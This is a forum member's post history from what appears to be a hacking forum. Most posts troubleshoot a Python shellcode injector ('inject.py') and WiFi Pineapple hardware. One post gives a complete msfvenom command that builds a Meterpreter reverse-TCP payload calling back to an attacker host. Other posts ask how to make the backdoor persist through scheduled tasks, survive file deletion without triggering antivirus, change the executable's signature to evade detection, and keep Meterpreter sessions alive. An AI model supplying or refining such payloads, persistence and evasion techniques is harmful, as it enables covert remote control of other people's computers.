wolfdale

Active Members
  • Posts: 36
  • Joined
  • Last visited
  • Days Won: 1

Everything posted by wolfdale

  1. I doubt it's a problem with the shellcode but I'll give it a try now. If I can't solve it messing around I'll wait for your update :P I'll let you know if I find out something. Thanks again, I owe you one!
  2. Woot that was quick, thanks. I'm still trying to figure out why x64 payload doesn't work on Windows 7 x64 though. I generated the payload as per your instructions and copied it into code1 variable. Still no shell. The payload is twice as long as a 32-bit payload, maybe there is a problem with memory allocation?
  3. Yup, but it's not really persistent because if someone deletes the .py (or even the .exe for that matter), the backdoor won't start again. I was asking if there is a way to move the inject.py somewhere safe (i.e. documents folder) without triggering antiviruses :P Thanks for your patience :PP
  4. Alright, thanks a lot!! I have one more question: Is there a way to make the inject.py code persistent? At the moment the SCHTASKS just starts a python window but doesn't execute inject.py. The cause probably is this line -> exe_loc = str(sys.executable) which points to python executable (python.exe) at the moment. I'm guessing that when the inject.py is compiled to an .exe this method would return the path to the .exe (which makes more sense :P). Since I'm using it in a non-conventional way (as a .py) this doesn't work. I modified it this way -> exe_loc = str("C:\Users\myusername\Desktop\inject.py") Is there a way to copy the inject.py somewhere (I'm thinking documents folder or smth) so that even if someone deletes the .py and reboots I don't lose the shell? Again, thanks for your help, much appreciated :)
  5. Sorry, it was kinda late (3 AM here), and went to bed :P The steps I did for now are: data=$(msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.249.128 LPORT=587 -f c | tr -d '\"' | tr -d '\n' | awk -F= '{print $2}' | awk '{print $1}') ; python -c 'import base64;print base64.encodestring("'$data'").replace("\n","")' Generated the payload for my IP. Copied it into the inject.py replacing code1 variable. Installed Python 2.7.5 onto the Windows victim machine. Started listener on attacker machine. Launched inject.py from the victim machine. But I get no shell on the listener... I'm using Windows 7 64 bit on the victim machine and Kali Linux fresh install as attacker machine. EDIT: found the problem. The payload works only on Windows 7 32 bit, not 64 bit :/ Any clue?
  6. Weird... I generated the payload changing IP address and port to my liking, both VMs are on the same (bridged to my network) LAN, copied the payload to the inject.py, launched it, and nothing, Metasploit shows no sessions :/ I even tried compiling with py2exe (oh, by the way, the resulting .exe doesn't have the .ico embedded into it after the process, minor problem).
  7. Uhm, is there a way to make it work as a simple Python file? Without compiling it to an .exe file with py2exe? I tried executing the inject.py but it kills explorer.exe almost instantly :/
  8. Hi, I just received my Mark V. I tried to set the password via the web interface. The password has % and $ characters in it. When the Pineapple restarts and I try to log in with the password I set, it won't let me in. I later tried (after resetting the Pineapple to defaults) to use a normal password without special characters. It works. Does the Pineapple have problems with special characters or is my keyboard layout a problem? (Not US) Thanks in advance :P
  9. Damn, I'm so impressed that inject.exe is so deadly! I've run it and it got detected by AVG but only after it was in memory, so the antivirus couldn't really do anything. Btw, in the Metasploit listener you are missing the command "use exploit/multi/handler". I would also add this command "set InitialAutoRunScript migrate -f" because explorer.exe wasn't stable enough and the sessions would die after a few seconds (in my VM at least). Thanks for your wonderful tool!
  10. Hi, can you post the source code for the inject.exe? Another noob question, how to change signature of the .exe file if it gets detected in the future? Thanks again for your release :)
  11. I ordered my Mark V and a travel kit the day after it was available. It got shipped today, also not showing the travel kit in the confirmation email! Hope it's just an error in the confirmation system.

      Item #                  | Description                                                      | Qty
      usb-powered-hub         | USB Powered Hub - USB Powered Hub                                | 1
      wifi-pineapple-standard | WiFi Pineapple Mark V Standard - WiFi Pineapple Mark IV Standard | 1